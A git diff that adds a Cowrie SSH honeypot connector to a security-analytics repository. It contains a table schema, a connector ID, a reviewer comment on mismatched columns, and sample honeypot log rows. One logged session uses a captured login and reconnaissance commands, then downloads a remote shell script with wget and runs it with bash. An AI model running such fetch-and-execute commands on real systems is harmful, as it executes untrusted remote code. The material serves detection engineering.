diff --git a/.script/tests/KqlvalidationsTests/CustomTables/newCowrie_CL.json b/.script/tests/KqlvalidationsTests/CustomTables/newCowrie_CL.json
new file mode 100644
index 00000000000..6e8f6a95f94
--- /dev/null
+++ b/.script/tests/KqlvalidationsTests/CustomTables/newCowrie_CL.json
@@ -0,0 +1,13 @@
+{
+ "Name": "newCowrie_CL",
+ "Properties": [
+ {
+ "Name": "TimeGenerated",
+ "Type": "DateTime"
+ },
+ {
+ "Name": "RawData",
+ "Type": "String"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json b/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json
index 3ed71726d42..9a8a0427840 100644
--- a/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json
+++ b/.script/tests/detectionTemplateSchemaValidation/ValidConnectorIds.json
@@ -250,6 +250,7 @@
 "RadiflowIsid",
 "CustomLogsAma",
 "SilverfortAma",
+ "SensorSSHCowrie",
 "IllumioSaaSDataConnector",
 "CTERA"
 ]
\ No newline at end of file
diff --git a/Sample Data/Custom/newCowrie_CL.csv b/Sample Data/Custom/newCowrie_CL.csv
new file mode 100644
index 00000000000..2e72019024f
--- /dev/null
+++ b/Sample Data/Custom/newCowrie_CL.csv
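Review bot: The custom-table schema for `newCowrie_CL` declares only `TimeGenerated` and `RawData`, while the `newCowrie_CL.csv` sample added in the same commit shows the table also carrying `Message`, `Severity`, `TenantId`, `Type` and `_ResourceId`, so any parser or analytic rule for this connector that projects or filters on one of those (for instance `_ResourceId` to attribute an event to the honeypot VM) would be rejected by KQL validation unless the harness injects the standard Log Analytics columns on its own, which is not visible from this diff. If it does not, add the columns the solution's KQL actually references, e.g. `{ "Name": "_ResourceId", "Type": "String" }`, with types matching the real table so validation does not accept a query that fails at runtime. Since `RawData` is a JSON string, every consumer is presumably expected to `parse_json(RawData)` and the declared schema should be the single place that contract is stated; a short README note next to the schema would make that explicit, as JSON itself cannot carry a comment. The file also ends without a trailing newline.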
@@ -0,0 +1,705 @@ +"TimeGenerated [UTC]","Timestamp [UTC]",RawData,Message,Severity,TenantId,Type,"_ResourceId" +"9/20/2024, 3:53:47.935 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.168.176.36"",""src_port"":39266,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""a619d69162d9"",""protocol"":""ssh"",""message"":""New connection: 45.168.176.36:39266 (10.0.0.4:2222) [session: a619d69162d9]"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:53:47.934557Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:53:47.937 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0004012584686279297,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:53:47.936345Z"",""src_ip"":""45.168.176.36"",""session"":""a619d69162d9""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:28.643 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.172.34.12"",""src_port"":22159,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9f8984885fc0"",""protocol"":""ssh"",""message"":""New connection: 172.172.34.12:22159 (10.0.0.4:2222) [session: 9f8984885fc0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:28.642670Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:28.645 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-PuTTY_Release_0.81"",""message"":""Remote SSH version: 
SSH-2.0-PuTTY_Release_0.81"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:28.644170Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:28.707 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""1dd4d89cd6b7a1f7b06acf808260c130"",""hasshAlgorithms"":""sntrup761x25519-sha512@openssh.com,curve448-sha512,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group18-sha512,diffie-hellman-group17-sha512,diffie-hellman-group16-sha512,diffie-hellman-group15-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,3des-ctr,3des-cbc,blowfish-ctr,blowfish-cbc,arcfour256,arcfour128;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com;none,zlib,zlib@openssh.com"",""kexAlgs"":[""sntrup761x25519-sha512@openssh.com"",""curve448-sha512"",""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group18-sha512"",""diffie-hellman-group17-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group15-sha512"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""rsa2048-sha256"",""rsa1024-sha1"",""diffie-hellman-group1-sha1"",""ext
-info-c"",""kex-strict-c-v00@openssh.com""],""keyAlgs"":[""ssh-ed25519"",""ssh-ed448"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-ctr"",""aes256-cbc"",""rijndael-cbc@lysator.liu.se"",""aes192-ctr"",""aes192-cbc"",""aes128-ctr"",""aes128-cbc"",""chacha20-poly1305@openssh.com"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""3des-ctr"",""3des-cbc"",""blowfish-ctr"",""blowfish-cbc"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96"",""hmac-md5"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-etm@openssh.com""],""compCS"":[""none"",""zlib"",""zlib@openssh.com""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 1dd4d89cd6b7a1f7b06acf808260c130"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:28.705045Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:49.709 AM",,"{""eventid"":""cowrie.login.success"",""username"":""jack"",""password"":""MCdoWell07@"",""message"":""login attempt [jack/MCdoWell07@] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:49.708604Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:49.837 AM",,"{""eventid"":""cowrie.client.size"",""width"":80,""height"":24,""message"":""Terminal Size: 80 
24"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:49.836883Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:49.842 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:49.838759Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:52.976 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ls -la"",""message"":""CMD: ls -la"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:52.976142Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:55.825 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd .."",""message"":""CMD: cd .."",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:55.823923Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:56.614 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ls"",""message"":""CMD: ls"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:56.612267Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:28:59.495 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd phil"",""message"":""CMD: cd phil"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:28:59.493528Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:09.351 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ps aux"",""message"":""CMD: ps aux"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:09.350115Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:18.662 AM",,"{""eventid"":""cowrie.command.input"",""input"":""tree"",""message"":""CMD: tree"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:18.661042Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:18.664 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""tree"",""message"":""Command not found: tree"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:18.663907Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:33.551 
AM",,"{""eventid"":""cowrie.command.input"",""input"":""wget https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh"",""message"":""CMD: wget https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:33.549627Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:33.680 AM",,"{""eventid"":""cowrie.session.file_download"",""url"":""https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh"",""outfile"":""var/lib/cowrie/downloads/3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e"",""shasum"":""3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:33.676964Z"",""message"":""Downloaded URL (https://raw.githubusercontent.com/swiftsolves-msft/projhpcowrie/refs/heads/main/script.sh) with SHA-256 3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e to var/lib/cowrie/downloads/3ff168ffcf3ddf450be0f94b4bd98a51c48584a79e7c42e7ac98d14fc58dd08e"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:35.163 AM",,"{""eventid"":""cowrie.command.input"",""input"":""ls"",""message"":""CMD: ls"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:35.162013Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:39.355 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cat script.sh "",""message"":""CMD: cat script.sh "",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:39.354324Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:49.258 AM",,"{""eventid"":""cowrie.command.input"",""input"":""./script.sh "",""message"":""CMD: ./script.sh "",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:49.258195Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:49.261 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""./script.sh"",""message"":""Command not found: ./script.sh"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:49.260750Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:29:59.220 AM",,"{""eventid"":""cowrie.command.input"",""input"":""bash ./script.sh "",""message"":""CMD: bash ./script.sh "",""sensor"":""server01"",""timestamp"":""2024-09-20T03:29:59.219689Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:30:03.750 AM",,"{""eventid"":""cowrie.command.input"",""input"":""exit"",""message"":""CMD: exit"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:30:03.749112Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:30:03.755 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/ce059bf64cbd71d981255c1c75c1f75428fc5244eadfc49725dc827a6cc0c554"",""size"":9881,""shasum"":""ce059bf64cbd71d981255c1c75c1f75428fc5244eadfc49725dc827a6cc0c554"",""duplicate"":false,""duration"":73.91482973098755,""message"":""Closing TTY Log: var/lib/cowrie/tty/ce059bf64cbd71d981255c1c75c1f75428fc5244eadfc49725dc827a6cc0c554 after 73 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:30:03.753066Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:30:03.785 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":95.14055728912354,""message"":""Connection lost after 95 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T03:30:03.784592Z"",""src_ip"":""172.172.34.12"",""session"":""9f8984885fc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:33:56.472 
AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""74.82.47.3"",""src_port"":27804,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1123e1b16048"",""protocol"":""ssh"",""message"":""New connection: 74.82.47.3:27804 (10.0.0.4:2222) [session: 1123e1b16048]"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:33:56.471478Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:33:56.473 AM",,"{""eventid"":""cowrie.client.version"",""version"":""\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa7b\\x94\u000b3\\xab\\xfe\\xfb\\xaeLt\u0000\\xe9W\\xb9?\u0007\\xc6\\xde.\\x9a\\xb6\\xe2"",""message"":""Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa7b\\x94\u000b3\\xab\\xfe\\xfb\\xaeLt\u0000\\xe9W\\xb9?\u0007\\xc6\\xde.\\x9a\\xb6\\xe2"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:33:56.473057Z"",""src_ip"":""74.82.47.3"",""session"":""1123e1b16048""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 5:33:56.475 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.001626729965209961,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T05:33:56.474536Z"",""src_ip"":""74.82.47.3"",""session"":""1123e1b16048""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:13.986 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":33300,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""78e060079161"",""protocol"":""ssh"",""message"":""New connection: 
192.155.90.118:33300 (10.0.0.4:2222) [session: 78e060079161]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:13.985449Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.054 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.053678Z"",""src_ip"":""192.155.90.118"",""session"":""78e060079161""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.056 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 
4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.054872Z"",""src_ip"":""192.155.90.118"",""session"":""78e060079161""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.293 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.3059194087982178,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.292752Z"",""src_ip"":""192.155.90.118"",""session"":""78e060079161""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.318 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":33302,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""d144ea1ed65e"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:33302 (10.0.0.4:2222) [session: d144ea1ed65e]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.317523Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.618 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.618000Z"",""src_ip"":""192.155.90.118"",""session"":""d144ea1ed65e""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.621 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.619271Z"",""src_ip"":""192.155.90.118"",""session"":""d144ea1ed65e""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.973 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.6540555953979492,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.972852Z"",""src_ip"":""192.155.90.118"",""session"":""d144ea1ed65e""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:14.998 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":33304,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""37d8a9aeed34"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:33304 (10.0.0.4:2222) [session: 37d8a9aeed34]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:14.997520Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:15.492 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:15.491431Z"",""src_ip"":""192.155.90.118"",""session"":""37d8a9aeed34""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" 